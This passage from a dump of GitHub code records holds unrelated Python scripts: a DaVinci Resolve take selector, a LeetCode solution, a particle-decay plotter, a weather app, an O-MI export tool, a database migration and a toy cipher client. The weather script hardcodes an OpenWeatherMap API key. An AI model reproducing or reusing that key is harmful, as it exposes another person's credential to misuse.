fps_int)\n return \"%02d:%02d:%02d%s%02d\" % (hours, minutes, seconds, smpte_token, frames) # usage example print frames_to_timecode(123214, 24, False)\n\ndef get_all_timeline_items():\n TimelineConca = []\n TimelineDict = dict()\n for i in range(1, trackcount + 1):\n TimelineItem = this_timeline().GetItemListInTrack(\"video\", i)\n TimelineConca = TimelineConca + TimelineItem\n for item in TimelineConca:\n enable_check = item.GetClipEnabled()\n if enable_check == True: \n frameID = item.GetStart()\n TimelineDictItem = {frameID: item}\n TimelineDict = merge_two_dicts(TimelineDict, TimelineDictItem)\n TimelineDict = OrderedDict(sorted(TimelineDict.items()))\n return TimelineDict\n\ndef read_all_timeline_clips(ev):\n itm['tree'].Clear()\n global refresher\n refresher = '1'\n mrk = itm['tree'].NewItem()\n mrk.Text[0] = 'ID'\n mrk.Text[1] = 'Name'\n mrk.Text[2] = 'Record In'\n mrk.Text[3] = 'Record Out'\n mrk.Text[4] = 'Takes'\n itm['tree'].SetHeaderItem(mrk)\n\n itm['tree'].ColumnCount = 5\n\n itm['tree'].ColumnWidth[0] = 75\n itm['tree'].ColumnWidth[1] = 200\n itm['tree'].ColumnWidth[2] = 100\n itm['tree'].ColumnWidth[3] = 100\n itm['tree'].ColumnWidth[4] = 50\n\n trackcount = this_timeline().GetTrackCount(\"video\")\n i = 0\n TimelineDict = get_all_timeline_items()\n if itm['takes_only'].Checked == True:\n for frameID in TimelineDict:\n item = TimelineDict[frameID]\n enable_check = item.GetClipEnabled()\n takes_count = item.GetTakesCount()\n if enable_check == True and takes_count > 1:\n i= i + 1\n mrk.Text[1] = 'Reel Name'\n mrk.Text[5] = 'Date Added'\n itm['tree'].ColumnCount = 6\n itm['tree'].ColumnWidth[5] = 200\n itRow = itm['tree'].NewItem()\n itRow.Text[0] = str(i)\n itRow.Text[1] = str(item.GetMediaPoolItem().GetClipProperty('Reel Name'))\n itRow.Text[2] = str(frames_to_timecode(item.GetStart(), framerate, False))\n itRow.Text[3] = str(frames_to_timecode(item.GetEnd(), framerate, False))\n itRow.Text[4] = str(takes_count)\n itRow.Text[5] = str(item.GetMediaPoolItem().GetClipProperty('Date Added'))\n itm['tree'].AddTopLevelItem(itRow)\n itm['tree'].SortByColumn(2, \"AscendingOrder\")\n else:\n for frameID in TimelineDict:\n item = TimelineDict[frameID]\n enable_check = item.GetClipEnabled()\n if enable_check == True:\n i= i + 1\n itRow = itm['tree'].NewItem()\n itRow.Text[0] = str(i)\n itRow.Text[1] = item.GetName()\n itRow.Text[2] = str(frames_to_timecode(item.GetStart(), framerate, False))\n itRow.Text[3] = str(frames_to_timecode(item.GetEnd(), framerate, False))\n itRow.Text[4] = str(item.GetTakesCount())\n itm['tree'].AddTopLevelItem(itRow)\n itm['tree'].SortByColumn(2, \"AscendingOrder\")\n\ndef get_nearest_less_element(d, k):\n k = int(k)\n nearest = max(key for key in map(int, d.keys()) if key <= k)\n return nearest\n\ndef take_index_dict(current_clip):\n index_count = current_clip.GetTakesCount()\n take_conca = {}\n for i in range(1, index_count + 1):\n take_info = {i:current_clip.GetTakeByIndex(i)}\n take_conca = merge_two_dicts(take_conca, take_info)\n take_conca = OrderedDict(reversed(sorted(take_conca.items())))\n return take_conca\n\ndef read_current_take(current_clip, take_index):\n itm['current_tree'].UpdatesEnabled = False\n itm['current_tree'].Clear()\n crt = itm['current_tree'].NewItem()\n crt.Text[0] = 'ID'\n crt.Text[1] = 'Clip Name'\n crt.Text[2] = 'Record In'\n crt.Text[3] = 'Record Out'\n crt.Text[4] = 'Takes'\n crt.Text[5] = 'Date Added'\n itm['current_tree'].SetHeaderItem(crt)\n itm['current_tree'].ColumnCount = 6\n\n itm['current_tree'].ColumnWidth[0] = 50\n itm['current_tree'].ColumnWidth[1] = 200\n itm['current_tree'].ColumnWidth[2] = 100\n itm['current_tree'].ColumnWidth[3] = 100\n itm['current_tree'].ColumnWidth[4] = 50\n itm['current_tree'].ColumnWidth[5] = 150\n Take_Dict = take_index_dict(current_clip)\n i = 0\n for takeID in Take_Dict:\n item_dict = Take_Dict[takeID]\n item = item_dict['mediaPoolItem']\n #startframe = item_dict['startFrame']\n\n crtRow = itm['current_tree'].NewItem()\n i= i + 1\n crtRow.Text[0] = str(i)\n crtRow.Text[1] = str(item.GetClipProperty('Clip Name'))\n crtRow.Text[2] = str(frames_to_timecode(current_clip.GetStart(), framerate, False))\n crtRow.Text[3] = str(frames_to_timecode(current_clip.GetEnd(), framerate, False))\n crtRow.Text[4] = str(current_clip.GetTakesCount())\n crtRow.Text[5] = str(item.GetClipProperty('Date Added'))\n if takeID == take_index:\n for n in range(0, 6):\n crtRow.BackgroundColor[n] = { 'R':99/255, 'G':99/255, 'B':99/255, 'A':0.5 }\n itm['current_tree'].AddTopLevelItem(crtRow)\n itm['current_tree'].UpdatesEnabled = True\n\ndef _show_takes(ev):\n current_clip = tl.GetCurrentVideoItem()\n current_take = int(current_clip.GetSelectedTakeIndex())\n read_current_take(current_clip, current_take)\n itm['show_take'].Hidden = True\n\ndef _previous_take(ev):\n current_clip = tl.GetCurrentVideoItem()\n current_takes_available = int(current_clip.GetTakesCount())\n current_take = int(current_clip.GetSelectedTakeIndex())\n if current_takes_available > 0:\n if current_take <= current_takes_available and current_take > 1:\n select_take = current_clip.SelectTakeByIndex(current_take - 1)\n take_index = current_take - 1\n read_current_take(current_clip, take_index)\n elif current_take == 1:\n select_take = current_clip.SelectTakeByIndex(1)\n take_index = 1\n read_current_take(current_clip, take_index)\n else:\n pass\n\ndef _next_take(ev):\n current_clip = tl.GetCurrentVideoItem()\n current_takes_available = int(current_clip.GetTakesCount())\n current_take = int(current_clip.GetSelectedTakeIndex())\n if current_takes_available > 0:\n if current_take < current_takes_available:\n select_take = current_clip.SelectTakeByIndex(current_take + 1)\n take_index = current_take + 1\n read_current_take(current_clip, take_index)\n elif current_take == current_takes_available:\n select_take = current_clip.SelectTakeByIndex(current_takes_available)\n take_index = current_takes_available\n read_current_take(current_clip, take_index)\n else:\n pass\n\ndef _double_click(ev):\n print(str(ev['item'].Text[0]))\n x = str(ev['item'].Text[0])\n current_clip = tl.GetCurrentVideoItem()\n current_takes_available = int(current_clip.GetTakesCount())\n current_clip.SelectTakeByIndex(current_takes_available-(int(x)-1))\n read_current_take(current_clip, int(current_clip.GetSelectedTakeIndex()))\n\ndef read_marker_color(color_filter):\n itm['tree'].Clear()\n global refresher\n refresher = '0'\n mrk = itm['tree'].NewItem()\n mrk.Text[0] = 'ID'\n mrk.Text[1] = 'Clip Name'\n mrk.Text[2] = 'Timecode'\n mrk.Text[3] = 'Takes'\n mrk.Text[4] = 'Color'\n mrk.Text[5] = 'Name'\n mrk.Text[6] = 'Notes'\n itm['tree'].SetHeaderItem(mrk)\n\n itm['tree'].ColumnCount = 7\n\n itm['tree'].ColumnWidth[0] = 50\n itm['tree'].ColumnWidth[1] = 150\n itm['tree'].ColumnWidth[2] = 75\n itm['tree'].ColumnWidth[3] = 50\n itm['tree'].ColumnWidth[4] = 60\n itm['tree'].ColumnWidth[5] = 100\n itm['tree'].ColumnWidth[6] = 150\n start_tc = read_timeline_startTC()\n all_marker = read_all_marker()\n all_marker = OrderedDict(sorted(all_marker.items()))\n i = 0\n TimelineDict = get_all_timeline_items()\n for mk_frameId in all_marker:\n marker_list = []\n mk = all_marker[mk_frameId]\n frame = mk_frameId + start_tc\n nearest = get_nearest_less_element(TimelineDict, frame)\n clipname = str(TimelineDict[nearest].GetName())\n takes_count = TimelineDict[nearest].GetTakesCount()\n color = str(mk['color'])\n duration = int(mk['duration'])\n note = str(mk['note'])\n name = str(mk['name'])\n customData = mk['customData']\n if itm['takes_only'].Checked == True:\n if color == color_filter or color_filter == 'All' and takes_count > 1:\n i= i + 1\n marker_list = [mk_frameId, color, duration, note, name, customData, clipname, takes_count]\n itRow = itm['tree'].NewItem()\n itRow.Text[0] = str(i)\n itRow.Text[1] = str(marker_list[6])\n itRow.Text[2] = str(frames_to_timecode(int(marker_list[0])+start_tc, framerate, False))\n itRow.Text[3] = str(marker_list[7])\n itRow.Text[4] = str(marker_list[1])\n itRow.Text[5] = str(marker_list[4])\n itRow.Text[6] = str(marker_list[3])\n itm['tree'].AddTopLevelItem(itRow)\n print (marker_list)\n itm['tree'].SortByColumn(2, \"AscendingOrder\")\n else:\n if color == color_filter or color_filter == 'All':\n i= i + 1\n marker_list = [mk_frameId, color, duration, note, name, customData, clipname, takes_count]\n itRow = itm['tree'].NewItem()\n itRow.Text[0] = str(i)\n itRow.Text[1] = str(marker_list[6])\n itRow.Text[2] = str(frames_to_timecode(int(marker_list[0])+start_tc, framerate, False))\n itRow.Text[3] = str(marker_list[7])\n itRow.Text[4] = str(marker_list[1])\n itRow.Text[5] = str(marker_list[4])\n itRow.Text[6] = str(marker_list[3])\n itm['tree'].AddTopLevelItem(itRow)\n print (marker_list)\n itm['tree'].SortByColumn(2, \"AscendingOrder\")\n\ndef _read_timeline_items():\n trackcount = this_timeline().GetTrackCount(\"video\")\n TimelineItem = []\n for i in range(1, trackcount + 1):\n TimelineItem = TimelineItem.extend(this_timeline().GetItemListInTrack(\"video\", i))\n\ndef _clicked(ev):\n print(str(ev['item'].Text[2]))\n x = str(ev['item'].Text[2])\n this_timeline().SetCurrentTimecode(x) \n\ndef _selected(ev):\n selected_item = itm['tree'].SelectedItems()\n return selected_item\n\ndef _apply_filter(ev):\n color = itm['color_list'].CurrentText\n read_marker_color(color)\n\ndef _refresh_filter(ev):\n color = itm['color_list'].CurrentText\n if refresher == '0':\n read_marker_color(color)\n if refresher == '1':\n read_all_timeline_clips(ev)\n\ndef main_ui(ui):\n window01 = ui.VGroup({\"Spacing\": 10,},[\n ui.HGroup({\"Spacing\": 10, \"Weight\": 7,},[ \n ui.Tree({\n 'ID': 'tree',\n 'SortingEnabled': True,\n 'SelectionMode': 'ExtendedSelection',\n 'Events': {\n 'ItemDoubleClicked': True,\n 'ItemClicked': True}}),\n ]),\n ui.HGroup({\"Spacing\": 10, \"Weight\": 5,},[ \n ui.Tree({\n 'ID': 'current_tree',\n 'SortingEnabled': True,\n 'SelectionMode': 'ExtendedSelection',\n 'Events': {\n 'ItemDoubleClicked': True,\n 'ItemClicked': True}\n }),\n ]),\n ui.HGroup({\"Spacing\": 7, \"Weight\": 0,},[\n ui.Label({ \"ID\": \"filter_text\",\"Text\": \"Marker Filter Color\",\"Weight\": 0}),\n ui.ComboBox({ \"ID\": \"color_list\",\"Weight\": 2}),\n ui.VGap({\"Weight\": 2}),\n ui.Button({ \"ID\": \"filter_color\", \"Text\": \"Apply\",\"Weight\": 0}),\n ui.Button({ \"ID\": \"reset_filter\", \"Text\": \"Show All\",\"Weight\": 0}),\n ui.Button({ \"ID\": \"refresh\", \"Text\": \"Refresh\",\"Weight\": 0}),\n ]),\n ui.HGroup({\"Spacing\": 7, \"Weight\": 0,},[\n ui.CheckBox({ \"ID\": \"takes_only\", \"Text\": \"Only show clips with multiple takes\", \"Weight\": 0}),\n ui.VGap({\"Weight\": 2}),\n ui.CheckBox({ \n\t\t\t\"ID\": \"show_take\", \n\t\t\t\"Text\": \"Auto Track Takes\",\n\t\t\t\"Weight\": 1,\n\t\t\t\"AutoRepeat\": True,\n\t\t\t\"AutoRepeatInterval\": 1500,\n\t\t\t\"AutoRepeatDelay\": 2000,\n\t\t\t\"Down\": True,\n 'Events': {\n 'Toggled': True,\n 'SetDown': True,\n 'SetAutoRepeat': True,\n 'Update': True,}}),\n ui.Button({ \"ID\": \"previous_take\", \"Text\": \"Previous Take\",\"Weight\": 0}),\n ui.Button({ \"ID\": \"next_take\", \"Text\": \"Next Take\",\"Weight\": 0}),\n ])\n ])\n return window01\n\nif __name__ == '__main__':\n\n window_01 = main_ui(ui)\n\n dlg = disp.AddWindow({ \n \"WindowTitle\": \"Take Selector V1.4\", \n \"ID\": \"MyWin\", \n 'WindowFlags': {\n 'Window': True,\n 'WindowStaysOnTopHint': True,\n },\n 'Events': {\n 'ContextMenu': True,\n 'FocusOut': True,\n 'Close': True},\n \"Geometry\": [ \n 800, 700, \n 700, 430\n ],\n },\n window_01)\n\n itm = dlg.GetItems()\n\n mrk = itm['tree'].NewItem()\n mrk.Text[0] = 'ID'\n mrk.Text[1] = 'Name'\n mrk.Text[2] = 'Record In'\n mrk.Text[3] = 'Record Out'\n mrk.Text[4] = 'Takes'\n itm['tree'].SetHeaderItem(mrk)\n itm['tree'].ColumnCount = 5\n\n itm['tree'].ColumnWidth[0] = 75\n itm['tree'].ColumnWidth[1] = 200\n itm['tree'].ColumnWidth[2] = 100\n itm['tree'].ColumnWidth[3] = 100\n itm['tree'].ColumnWidth[4] = 50\n\n crt = itm['current_tree'].NewItem()\n crt.Text[0] = 'ID'\n crt.Text[1] = 'Reel Name'\n crt.Text[2] = 'Record In'\n crt.Text[3] = 'Record Out'\n crt.Text[4] = 'Takes'\n crt.Text[5] = 'Date Added'\n itm['current_tree'].SetHeaderItem(crt)\n itm['current_tree'].ColumnCount = 6\n\n itm['current_tree'].ColumnWidth[0] = 75\n itm['current_tree'].ColumnWidth[1] = 200\n itm['current_tree'].ColumnWidth[2] = 100\n itm['current_tree'].ColumnWidth[3] = 100\n itm['current_tree'].ColumnWidth[4] = 50\n itm['current_tree'].ColumnWidth[5] = 200\n\n trackcount = this_timeline().GetTrackCount(\"video\")\n i = 0\n TimelineDict = get_all_timeline_items()\n if itm['takes_only'].Checked == True:\n for frameID in TimelineDict:\n item = TimelineDict[frameID]\n enable_check = item.GetClipEnabled()\n takes_count = item.GetTakesCount()\n if enable_check == True and takes_count > 1:\n i= i + 1\n mrk.Text[1] = 'Reel Name'\n mrk.Text[5] = 'Date Added'\n itm['tree'].ColumnCount = 6\n itm['tree'].ColumnWidth[5] = 200\n itRow = itm['tree'].NewItem()\n itRow.Text[0] = str(i)\n itRow.Text[1] = item.GetMediaPoolItem().GetClipProperty('Reel Name')\n itRow.Text[2] = str(frames_to_timecode(item.GetStart(), framerate, False))\n itRow.Text[3] = str(frames_to_timecode(item.GetEnd(), framerate, False))\n itRow.Text[4] = str(takes_count)\n itRow.Text[5] = str(item.GetMediaPoolItem().GetClipProperty('Date Added'))\n itm['tree'].AddTopLevelItem(itRow)\n itm['tree'].SortByColumn(2, \"AscendingOrder\")\n else:\n for frameID in TimelineDict:\n item = TimelineDict[frameID]\n enable_check = item.GetClipEnabled()\n if enable_check == True:\n i= i + 1\n itRow = itm['tree'].NewItem()\n itRow.Text[0] = str(i)\n itRow.Text[1] = item.GetName()\n itRow.Text[2] = str(frames_to_timecode(item.GetStart(), framerate, False))\n itRow.Text[3] = str(frames_to_timecode(item.GetEnd(), framerate, False))\n itRow.Text[4] = str(item.GetTakesCount())\n itm['tree'].AddTopLevelItem(itRow)\n itm['tree'].SortByColumn(2, \"AscendingOrder\")\n\n itm['color_list'].AddItems(marker_color)\n\n dlg.On.filter_color.Clicked = _apply_filter\n dlg.On.reset_filter.Clicked = read_all_timeline_clips\n dlg.On.refresh.Clicked = _refresh_filter\n dlg.On.current_tree.ItemDoubleClicked = _double_click\n dlg.On.previous_take.Clicked = _previous_take\n dlg.On.next_take.Clicked = _next_take\n dlg.On.show_take.Toggled = _show_takes\n dlg.On.tree.ItemDoubleClicked = _clicked\n dlg.On.tree.ItemClicked = _selected\n dlg.On.MyWin.Close = _exit\n\n dlg.Show()\n disp.RunLoop()\n dlg.Hide()\n\n\n","repo_name":"qiuboujun/Script","sub_path":"Take_Selector_V1.4.py","file_name":"Take_Selector_V1.4.py","file_ext":"py","file_size_in_byte":23714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32981494407","text":"# Write a function that takes a string as input and reverse only the vowels of a string.\n#\n# Example 1:\n#\n# Input: \"hello\"\n# Output: \"holle\"\n# Example 2:\n#\n# Input: \"leetcode\"\n# Output: \"leotcede\"\n# Note:\n# The vowels does not include the letter \"y\".\n\nclass Solution(object):\n def reverseVowels(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n if not s or len(s) < 2:\n return s\n l = list(s)\n length = len(l)\n vowels = set(['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U'])\n i, j = 0, length - 1\n while i < j:\n if l[i] not in vowels:\n i += 1\n continue\n if l[j] not in vowels:\n j -= 1\n continue\n if i < j:\n self.swap(l, i, j)\n i += 1\n j -= 1\n return ''.join(l)\n\n def swap(self, l, i, j):\n temp = l[i]\n l[i] = l[j]\n l[j] = temp\n\n\ns = Solution()\nprint(s.reverseVowels(\"leetcode\"))\n","repo_name":"yshshadow/Leetcode","sub_path":"300-/345.py","file_name":"345.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19021478546","text":"import re\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom particle import Particle\n\ndef particle_to_latex(pdgid):\n pdgid = int(pdgid)\n try:\n return ' '+Particle.from_pdgid(pdgid).latex_name\n except:\n if pdgid==20423:\n return 'D_{1}(2430)^{0}'\n elif pdgid==-20423:\n return '\\\\bar{D}_{1}(2430)^{0}'\n elif pdgid==20413:\n return 'D_{1}(H)^{+}'\n elif pdgid==-20413:\n return 'D_{1}(H)^{-}'\n elif pdgid==10413:\n return 'D_{1}(2420)^{+}'\n elif pdgid==-10413:\n return 'D_{1}(2420)^{-}'\n elif pdgid==5214:\n return '\\\\Sigma*_{b}^{0}'\n elif pdgid==-5214:\n return '\\\\bar{\\\\Sigma}*_{b}^{0}'\n elif pdgid==5212:\n return '\\\\Sigma_{b}^{0}'\n elif pdgid==-5212:\n return '\\\\bar{\\\\Sigma}*_{b}^{0}'\n elif pdgid==5314:\n return '\\\\Xi*_{b}^{-}'\n elif pdgid==-5314:\n return '\\\\Xi*_{b}^{+}'\n elif pdgid==5312:\n return \"\\\\Xi'_{b}^{-}\"\n elif pdgid==-5312:\n return \"\\\\Xi'_{b}^{+}\"\n print('pdg not found', pdgid) \n return ' %d'%pdgid\n# import pdb ; pdb.set_trace()\n\ndef relabel(label):\n newlabel = r'$'\n pdgid = ''\n for i in label:\n if i == '(':\n if len(pdgid): newlabel += particle_to_latex(pdgid)\n newlabel += '(\\\\rightarrow '\n pdgid = ''\n elif i == ')':\n if len(pdgid): newlabel += particle_to_latex(pdgid)\n newlabel += ')'\n pdgid = ''\n elif i == ',':\n if len(pdgid): newlabel += particle_to_latex(pdgid)\n pdgid = ''\n else:\n pdgid += i\n return newlabel+'$'\n\n# ff = open('decay_with_stars.pkl')\n# ff = open('decay.pkl')\n# ff = open('decay_no_acceptance.pkl')\n# ff = open('decay_no_acceptance_fullstat.pkl')\nff = open('decay_no_acceptance_fullstat_test.pkl')\ndecays = pickle.load(ff)\nff.close()\n\nplt.rcdefaults()\n# fig, ax = plt.subplots(figsize=(100, 200))\n# fig, ax = plt.subplots(figsize=(18, 8))\n# fig, ax = plt.subplots(figsize=(18, 18))\n# fig, ax = plt.subplots(figsize=(18, 36))\n# fig, ax = plt.subplots(figsize=(18, 54))\n# fig, ax = plt.subplots(figsize=(18, 72))\n# fig, ax = plt.subplots(figsize=(22, 1500))\n# fig, ax = plt.subplots()\n\nalldecays = sorted(decays.items(), key=lambda x: x[1], reverse=True)\ntotal_events = np.sum(np.array([idecay[1] for idecay in alldecays]))\n# alldecays = alldecays[:25]\n# alldecays = alldecays[:50]\n# alldecays = alldecays[:100]\n\ndecays = [idecay[0] for idecay in alldecays] #list(alldecays.keys())\noccurrences = [idecay[1] for idecay in alldecays]\ny_pos = np.arange(len(decays))\nfrequency = np.array(occurrences).astype(np.float32)/total_events\nnewlabels = map(relabel, decays)\n\nprint('total decays', len(decays))\n\ncounter = 1\nfor ichunk in range(len(frequency)%100 + 1):\n if counter > 4: break\n fig, ax = plt.subplots(figsize=(18, 54))\n print('doing chunk', counter)\n ini = ichunk*100\n fin = (ichunk+1)*100\n ax.barh(y_pos[ini:fin], frequency[ini:fin], align='center')\n for i, v in enumerate(frequency[ini:fin]):\n ax.text(v, i, '%.3f%s'%(100.*v, '%'), color='black', fontweight='bold')\n ax.set_yticks(y_pos[ini:fin])\n # ax.set_yticklabels(map(relabel, decays))\n ax.set_yticklabels(newlabels[ini:fin])\n ax.invert_yaxis() # labels read top-to-bottom\n ax.set_xlabel('Frequency')\n # ax.set_title(r'B hadron decays giving rise to $D*(2010)^{+}(\\rightarrow D^{0}(\\rightarrow K^{-}\\pi^{+})\\pi^{+})\\mu$ in the acceptance. Charge conjugation implied')\n ax.set_title(r'B hadron decays giving rise to $D*(2010)^{+}(\\rightarrow D^{0}(\\rightarrow K^{-}\\pi^{+})\\pi^{+})\\mu$. Charge conjugation implied')\n ax.set_xscale('log')\n # ax.set_aspect(aspect=10)\n # ax.set_xlim(300, 400)\n # ax.set_box_aspect(10)\n ax.margins(y=0.001)\n fig.tight_layout()\n\n # plt.savefig('decay_frequency_nicer.pdf')\n plt.savefig('alldecays/decay_frequency_no_acceptance_fullstat_chunk%d.pdf' %counter)\n plt.savefig('alldecays/decay_frequency_no_acceptance_fullstat_chunk%d.png' %counter)\n \n# fig.clf()\n \n counter += 1\n","repo_name":"lecriste/RDst","sub_path":"plot_decays.py","file_name":"plot_decays.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"41959444792","text":"import pyowm, json\nowm = pyowm.OWM('538cea50e439653ca98c8a8c1f5b6f8b')\n\n#make a class next time to add in self to each instanace\n#locations=['Sunnyvale, US', 'San Jose, US', 'Palo Alto, US', 'San Francisco, US', 'Oakland, US', 'Berkeley, US']\n#attributes=['temp', 'temp_min', 'temp_max', 'humidity']\n#weather_data = {} #a dict of dict to store weather data\n\nclass Weather:\n\tdef __init__(self):\n\t\t\"\"\"constructor\"\"\"\n\t\tself.sample = 'This is the weather main app from weather module'\n\n\tdef main(self):\n\t\t\"print the sample string\"\n\t\t#print(self.sample)\n\n\tdef collect_weather_data(self,locations, attributes, weather_data):\n\t\tfor city in locations:\n\t\t#get weather data from owm API\n\t\t\tweather = owm.weather_at_place(city)\n\t\t\ttemperature_1 = weather.get_weather()\n\t\t\ttemperature = temperature_1.get_temperature('fahrenheit')\n\t\t\thumidity_1 = weather.get_weather()\n\t\t\thumidity = humidity_1.get_humidity()\n\t\t#forecast data from owm API\n\t\t\tforecast = owm.daily_forecast(city)\n\t\t\tsun = forecast.will_have_sun()\n\t\t\train = forecast.will_have_rain()\n\t\t\tclouds = forecast.will_have_clouds()\n\t\t\tsnow = forecast.will_have_snow()\n\t\t#for each city, store its weather attributes into weather_data\n\t\t\tweather_data[city] = {}\n\t\t\tfor attribute in attributes:\n\t\t\t\tif attribute == 'humidity':\n\t\t\t\t\tweather_data[city][attribute] = str(humidity)\n\t\t\t\telif 'will_have' in attribute:\n\t\t\t\t\tif'sun' in attribute:\n\t\t\t\t\t\tweather_data[city][attribute] = str(sun)\n\t\t\t\t\telif 'rain' in attribute:\n\t\t\t\t\t\tweather_data[city][attribute] = str(rain)\n\t\t\t\t\telif 'clouds' in attribute:\n\t\t\t\t\t\tweather_data[city][attribute] = str(clouds)\n\t\t\t\t\telse:\n\t\t\t\t\t#snow\n\t\t\t\t\t\tweather_data[city][attribute] = str(snow)\n\t\t\t\telse:\n\t\t\t\t\tweather_data[city][attribute] = str(temperature[attribute])\n\n\tdef print_weather_data(self, weather_data):\n\t\t\"\"\"Print Weather data\"\"\"\n\t\tcount = 1\n\t\tfor city, weather in weather_data.items():\n\t\t\tprint(count,city,'===>')\n\t\t\tfor attr, value in weather.items():\n\t\t\t\tprint(str(attr) + ':'+ str(value))\n\t\t\tcount = count + 1\n\n\tdef convert_to_json(self, weather_data):\n\t\t\"\"\"Convert weather data into readable json format\"\"\"\n\t\trow = {}\n\t\tfor city, weather in weather_data.items():\n\t\t\trow['location'] = city\n\t\t\trow.update({attr: value for attr, value in weather.items()})\n\t\t\t#print(row)\n\t\t\tj = json.dumps(row)\n\t\t\tprint(j)\n\tsample = 'Hello World!'\n'''\n\t\t#save this for unit testing\n\t\tprint(city + '===>')\n\t\tprint('Current temperature:' + str(temperature['temp']))\n\t\tprint('Minimum temperature:' + str(temperature['temp_min']))\n\t\tprint('Maximum temperature:' + str(temperature['temp_max']))\n\t\tprint('Humidity:' + str(humidity) + '%')\n'''\n","repo_name":"jonfang/Django_Weather","sub_path":"main_site/weather/lib/core/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44472456121","text":"#!/usr/bin/python3\n\nimport sys, getopt, requests\nfrom xml.etree.ElementTree import register_namespace, fromstring, ElementTree, Element, tostring\n\ndef update_odf(elem):\n for child in elem.getchildren():\n update_odf(child)\n tag = child.tag\n if (tag == '{http://www.opengroup.org/xsd/odf/1.0/}InfoItem') or (tag == '{http://www.opengroup.org/xsd/odf/1.0/}Object'):\n child.insert(1,Element('{http://www.opengroup.org/xsd/odf/1.0/}description'))\n if (tag == '{http://www.opengroup.org/xsd/odf/1.0/}InfoItem'):\n child.remove(child.find(\"./{http://www.opengroup.org/xsd/odf/1.0/}value\"))\n child.append(Element('{http://www.opengroup.org/xsd/odf/1.0/}MetaData'))\ndef main(argv):\n hostn = 'http://localhost:8080' #localhost at default port\n output = 'odfdump.xml' #default file\n try:\n opts, args = getopt.getopt(argv,\"ho:\")\n except getopt.GetoptError:\n print('getAllData.py -o host')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print('getAllData.py -o host')\n sys.exit()\n elif opt == '-o':\n output = arg\n if len(args) >= 1:\n hostn = args[0]\n\n #request for odf hierarchy\n hierarchyRequest = \"\"\"\n \n \n \n \n \n\"\"\"\n #request for 9000 newest values(should be enough for now) \n fullRequest = \"\"\"\n \n \n \n \n\"\"\"\n\n\n #register namespaces so that we don't get wrong namespaces in the request\n register_namespace(\"omi\",\"omi.xsd\")\n register_namespace(\"odf\", \"odf.xsd\")\n register_namespace(\"\", \"http://www.w3.org/2001/XMLSchema-instance\")\n headers = {'Content-Type': 'application/xml'}\n\n #current hierarchy\n r = requests.post(hostn, data = hierarchyRequest, headers = headers).text\n\n root = fromstring(r)\n \n objects = root.find(\".//{http://www.opengroup.org/xsd/odf/1.0/}Objects\")\n #remove values and add metadata and description tags\n update_odf(objects)\n\n fullRoot = fromstring(fullRequest)\n\n fullRoot.find(\".//{http://www.opengroup.org/xsd/omi/1.0/}msg\").append(objects)\n\n #write result to file. note: result might be big so iterate over the result\n with open(output,'wb') as handle:\n r2 = requests.post(hostn, data = tostring(fullRoot, encoding=\"utf-8\"), headers = headers, stream = True)\n if not r2.ok:\n print(\"INVALID RESPONSE\")\n for block in r2.iter_content(1024):\n handle.write(block)\n\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"AaltoAsia/O-MI","sub_path":"tools/getAllData.py","file_name":"getAllData.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"61"} +{"seq_id":"35280333443","text":"\"\"\"empty message\n\nRevision ID: b80bbb12beda\nRevises: e7c262b6f986\nCreate Date: 2022-11-10 16:11:36.578577\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy import Boolean, String\nfrom sqlalchemy.sql import column, table\n\n\n# revision identifiers, used by Alembic.\nrevision = 'b80bbb12beda'\ndown_revision = 'e7c262b6f986'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('entities', sa.Column('corp_sub_type_code', sa.String(length=15), nullable=True))\n op.create_foreign_key('corp_subtype_fkey', 'entities', 'corp_types', ['corp_sub_type_code'], ['code'])\n corp_type_table = table('corp_types',\n column('code', String),\n column('description', String),\n column('default', Boolean)\n )\n op.bulk_insert(\n corp_type_table,\n [\n {'code': 'CC', 'description': 'BC Community Contribution Company', 'default': False}\n ]\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint('corp_subtype_fkey', 'entities', type_='foreignkey')\n op.drop_column('entities', 'corp_sub_type_code')\n op.execute(\"delete from corp_types where code in ('CC')\")\n # ### end Alembic commands ###\n","repo_name":"bcgov/sbc-auth","sub_path":"auth-api/migrations/versions/b80bbb12beda_add_entity_corp_sub_type.py","file_name":"b80bbb12beda_add_entity_corp_sub_type.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"27022673601","text":"from socket import socket\nimport math\n\nPORT = 8000\nHOST = \"127.0.0.1\"\n\nADDR = (HOST, PORT)\n\n_s = socket()\n_s.connect(ADDR)\n\nKEY = \"ABCD\"\n\ndef encrypt(message):\n col = len(KEY)\n\n ct = \"\"\n kidx = 0\n keyList = sorted(list(KEY))\n mlen = float(len(message))\n row = int(math.ceil(mlen/col))\n mlist = list(message)\n\n nullChar = int((row*col) - mlen)\n mlist.extend(\"_\"*nullChar)\n matrix = [mlist[i:i+col] for i in range(0, len(mlist), col)]\n\n for _ in range(col):\n currIdx = KEY.index(keyList[kidx])\n ct += \"\".join([row[currIdx] for row in matrix])\n kidx += 1\n\n return ct\n\n\n\ndef main():\n message = input(\"Enter the string: \")\n ct = encrypt(message).encode()\n print(f\"CT: {encrypt(message)}\")\n _s.send(ct)\n 